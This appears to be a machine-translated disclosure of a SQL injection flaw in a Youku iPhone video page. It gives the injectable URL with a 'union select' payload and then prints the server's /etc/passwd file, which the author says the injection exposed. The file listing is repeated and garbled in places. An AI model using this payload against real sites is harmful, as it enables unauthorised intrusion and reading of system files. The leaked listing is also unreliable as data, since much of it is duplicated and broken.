Http: iphone. youku. comvideo. php? Ch1id18751916and12unionselect1, 2, user: root: x: 0: 0: root: binbashbin: x: 1: 1: bin: sbi
Http://iphone.youku.com/vIdEo.Php? Ch = 1 & id = 18751916 and 1 = 2 union select, user /*
I did not expect that youku has such a problem. The permission is not small. If you can read the file, it seems that security is still from the beginning:
Root: x: 0: 0: root:/bin/bash
Bin: x: 1: 1: bin:/sbin/nologin
Daemon: x: 2: 2: daemon:/sbin/nologin
Adm: x: 3: 4: adm:/var/adm:/sbin/nologin
Lp: x: 4: 7: lp:/var/spool/Lpd:/Sbin/nologin
SyNc: X: 5: 0:Sync:/Sbin:/bin/sync
Shutdown: x: 6: 0: shutdown:/sbin/shutdown
Halt: X: 7: 0: halt:/sbin/halt
Mail: x: 8: 12: mail:/var/spool/mail:/sbin/nologin
News: x: 9: 13: news:/etc/news:
UuCp: X: 10: 14:Uucp:/Var/spool/uucp:/sbin/nologin
Operator: x: 11: 0: operator:/root:/sbin/nologin
Games: x: 12: 100: games:/usr/games:/sbin/nologin
Gopher: x: 13: 30: gopher:/var/gopher:/sbin/nologin
Ftp: X: 14: 50: FTP User:/var/ftp:/sbin/nologin
Nobody: x: 99: 99: Nobody: // sbin/nologin
Rpm: x: 37: 37:/var/lib/rpm:/sbin/nologin
Messages: x: 81: 81: System message bus: // sbin/nologin
Distcache: x: 94: 94: Distcache: // sbin/nologin
Ntp: x: 38: 38:/etc/ntp:/sbin/nologin
NsCd: X: 28: 28: NSCD Daemon: // sbin/nologin
Vcsa: x: 69: 69: virtual console memory owner:/dev:/sbin/nologin
Apache: x: 48: 48: Apache:/var/www:/sbin/nologin
Avahi: x: 70: 70: Avahi daemon: // sbin/nologin
Rpc: x: 32: 32: Portmapper RPC user: // sbin/nologin
Rpcuser: x: 29: 29: RPC Service User:/var/lib/nfs:/sbin/nologin
Nfsnobody: x: 65534: 65534: Anonymous NFS User:/var/lib/nfs:/sbin/nologin
MaiLnUll: x: 47: 47:/var/spool/mqueue:/sbin/nologin
Smmsp: x: 51: 51:/var/spool/mqueue:/sbin/nologin
Haldaemon: x: 68: 68: HAL daemon: // sbin/nologin
Sshd: x: 74: 74: Privilege-separatEdSSH:/var/empty/sshd:/sbin/nologin
Webalizer: x: 67: 67: Webalizer:/var/www/usage:/sbin/nologin
Squid: x: 23: 23:/var/spool/squid:/sbin/nologin
Mysql: x: 27: 27: MySQL Server:/var/lib/mysql:/bin/bash
NetDuMp: x: 34: 34: Network Crash Dump user:/var/crash:/bin/bash
Pcap: x: 77: 77:/var/Arpwatch:/Sbin/nologin
Xfs: x: 43: 43: X Font Server:/etc/X11/fs:/sbi/rpm:/sbin/nologin
Messages: x: 81: 81: System message bus: // sbin/nologin
Distcache: x: 94: 94: Distcache: // sbin/nologin
Ntp: x: 38: 38:/etc/ntp:/sbin/nologin
Nscd: x: 28: 28: NSCD Daemon: // sbin/nologin
Vcsa: x: 69: 69: virtual console memory owner:/dev:/sbin/nologin
Apache: x: 48: 48: Apache:/var/www:/sbin/nologin
Avahi: x: 70: 70: Avahi daemon: // sbin/nologin
Rpc: x: 32: 32: Portmapper RPC user: // sbin/nologin
Rpcuser: x: 29: 29: RPC Service User:/var/lib/nfs:/sbin/nologin
Nfsnobody: x: 65534: 65534: Anonymous NFS User:/var/lib/nfs:/sbin/nologin
Mailnull: x: 47: 47:/var/spool/mqueue:/sbin/nologin
Smmsp: x: 51: 51:/var/spool/mqueue:/sbin/nologin
Haldaemon: x: 68: 68: HAL daemon: // sbin/nologin
Sshd: x: 74: 74: Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
Webalizer: x: 67: 67: Webalizer:/var/www/usage:/sbin/nologin
Squid: x: 23: 23:/var/spool/squid:/sbin/nologin
Mysql: x: 27: 27: MySQL Server:/var/lib/mysql:/bin/bash
NetDump: X: 34: 34: Network Crash Dump user:/var/crash:/bin/bash
Pcap: x: 77: 77:/var/arpwatch:/sbin/nologin
Xfs: x: 43: 43: X Font Server:/etc/X11/fs:/sbin/nologin
Yoqox: 48: 48:/opt/1 verge/:/sbin/nologin
Flumotion: x: 100: 101:/var/cache/flumotion:/sbin/nologin
Qtss: x: 500: 502:/home/qtss:/sbin/nologin
Apt: x: 501: 503:/opt/1 verge/iphone/www/apt:/bin/bash
Rsync: x: 502: 504:/home/rsync:/bin/bash